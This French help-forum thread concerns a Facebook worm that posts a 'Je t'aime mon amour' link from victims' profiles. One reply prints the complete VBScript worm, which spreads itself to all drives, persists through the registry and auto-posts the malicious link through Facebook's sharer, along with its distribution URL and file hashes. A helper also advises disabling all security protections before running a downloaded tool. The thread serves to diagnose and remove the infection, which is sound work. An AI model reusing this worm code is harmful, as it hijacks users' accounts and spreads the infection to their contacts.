Virus "Je t'aime mon amour" sur facebook

Capricious -  
juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   -
Bonjour,
J'ai cliqué sur un lien facebook "Je t'aime mon amour" qui a ouvert une page de téléchargement avec un fichier ZIP et comme une idiote j'ai bien sur téléchargé le fichier qui se trouvait à l'intérieur. Depuis à chaque démarrage d'ordinateur et environ toute les 20 minutes, un virus publie ce lien "Je t'aime mon amour" sur mon profil. Comment faire pour bloquer ce virus ? De plus quand je lance AVAST, tout mes dossiers ne sont pas testé car "protégés par un mot de passe" ce qui n'est pourtant pas le cas.
Merci de votre aide !

4 réponses

  1. juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
     
    Salut,

    Si tu as encore le lien, peux-tu le coller ?
    Ou si tu as encore le fichier ZIP, peux-tu l'envoyer sur https://forums-fec.be/upload et me coller le lien qu'il t'a donné ?

    Merci :)

    ça me permettra de comprendre l'infection pour t'aider :D

    ================================================

    Attention !!! : cet outil peut etre détecté à tort comme virus
    Attention !!! : cet outil est puissant suivre scrupuleusement les instructions ci-dessous


    Tous les processus "non vitaux de windows" vont être coupés , enregistre ton travail.


    Désactive toutes tes protections si possible , antivirus , sandbox , pare-feux , etc....

    Télécharge et enregistre Pre_Scan sur ton bureau :

    https://forums-fec.be/gen-hackman/Pre_Scan.exe

    Miroirs :

    http://general-changelog-team.fr/fr/downloads/viewdownload/41-outils-de-gen-hackman/52-pre-scan
    http://www.archive-host.com

    Avertissement :Il y aura une extinction du bureau pendant le scan --> pas de panique.

    Une fois telechargé lance-le , laisse faire le scan jusqu'à l'apparition de "Pre_scan_la_date_et_l'heure.txt" sur le bureau.

    Si l'outil est relancé plusieurs fois , il te proposera un menu et qu'aucune option n'est demandée, lance l'option "Kill"

    Si l'outil est bloqué par l'infection utilise cette version avec extension .pif :

    https://forums-fec.be/gen-hackman/Pre_Scan.pif

    Si l'outil detecte un proxy et que tu n'en as pas installé clique sur "supprimer le proxy"

    Il se peut qu'une multitude de fenêtres noires clignotent , laisse-le travailler

    Poste Pre_Scan_la_date_et_l'heure.txt qui apparaitra sur le bureau en fin de scan

    Il est possible que l'outil fasse redemarrer ton pc plusieurs fois , laisse-le faire

    NE LE POSTE PAS SUR LE FORUM !!! (il est trop long)

    Heberge le rapport sur FEC Upload puis donne le lien obtenu en echange

    Si possible , confirme ou infirme l'utilisation de Defogger par Pre_Scan

    .::. Contributeur Sécurité .::.
    0
  2. Capricious
     
    Bonjour, déjà merci de répondre si rapidement !
    Le lien est le suivant : http://kamasms.fr/vi.html
    0
    1. rapide
       
      On error resume next '11/07/2012 by N@ks
      Set C = CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName)
      Set Nn1 = CreateObject("WScript.Shell")
      Set Nn2 = CreateObject("Scripting.FileSystemObject")
      Set Nn3 = Nn2.GetSpecialFolder(1)
      Set Drives=Nn2.drives
      Bm = Nn1.SpecialFolders("Startup")
      Do
      For Each Drive in Drives
      If drive.isready then
      Nn2.CopyFile ""&WScript.ScriptFullName&"" , ""&drive&"\Je_t'aime.vbs"
      end If
      Next
      C.Copy(Nn3&"\Knucker.C.vbs")
      If Nn2.FileExists(Nn3&"\Knucker.C.vbs") Then
      Nn1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Pdll", ""&Nn3&"\Knucker.C.vbs"
      Else
      C.Copy(Bm&"\Wsserv.vbs")
      End If
      wscript.sleep 10000
      Nn1.run "http://www.facebook.com/sharer.php?u=http://kamasms.fr/vi.html"
      wscript.sleep 7000
      Nn1.SendKeys ("{tab}")
      Nn1.SendKeys ("{tab}")
      Nn1.SendKeys ("{tab}")
      Nn1.SendKeys ("Je t'aime mon amoooouuuurrr <3<3<3 :) !")
      wscript.sleep 121
      Nn1.SendKeys ("{tab}")
      Nn1.SendKeys ("{enter}")
      wscript.sleep 121
      Nn1.SendKeys ("^{F4}")
      wscript.sleep 1000*60*15
      Loop
      
      0
    2. rapide
       
      http://kamasms.fr/vi.html => http://kamasms.fr/Je_t%27aime.zip :

      (tempuser=>7-Zip)\Je_t'aime.zip

      651 octets (651 octets)
      651 octets (651 octets)

      CRC32: 7E383407
      MD5: 98A28BEA636D331FE1BD29C815A541E7
      SHA-1: A7CD080AF3659DD48556C05D0A9646A790C81D21
      SHA-256: 48CD9A43CF3B7F3CDDC5235EC53F10B608918DBA8717CBD5541CE75DFCCABE8C

      (tempuser=>7-Zip)\Je_t'aime.zip\Je_t'aime.vbs

      1,04 Ko (1 069 octets)
      1,04 Ko (1 069 octets)

      CRC32: 565EACC0
      MD5: F4F0BF9989464889EEF9A5C4B786E8FC
      SHA-1: 67A6A77E85088CBF2AA7D2DE9AC86FFB696F27BF
      SHA-256: 5548E4E1CC6DA289F881B749669FE7B2372B3AD296C803344780738E09A896B8
      0
    3. Utilisateur anonyme
       
      Quelle blond j'ai cliquer sur ton lien... --'
      0
  3. Floflo
     
    J'ai le même problème. Comment arrêter tout ça?
    0
    1. juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
       
      Ouvre un nouveau sujet
      0
    2. Floflo
       
      Pourquoi créer un sujet alors que je suis exactement dans le même cas que toi?
      0
    3. Utilisateur anonyme
       
      Parce que sinon les helpers et les helpé s'embrouillent :)
      0
    4. Floflo
       
      Ok ^^ je vais faire ça alors
      0
  4. juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
     
    @Capricious : et mon rapport Pre_Scan ? :)
    0
    1. capricious
       
      J'ai lancé le scan, apres 3h mon ordinateur c'est arrêté depuis impossible de le relancer, il s'allume mais lorsque j'ouvre la session l'ecran reste rouge et rien ne se passe (pas de menu demarer, rien).
      0
    2. juju666 Messages postés 35446 Date d'inscription   Statut Contributeur sécurité Dernière intervention   4 796
       
      heu ...

      et en mode sans échec ?
      0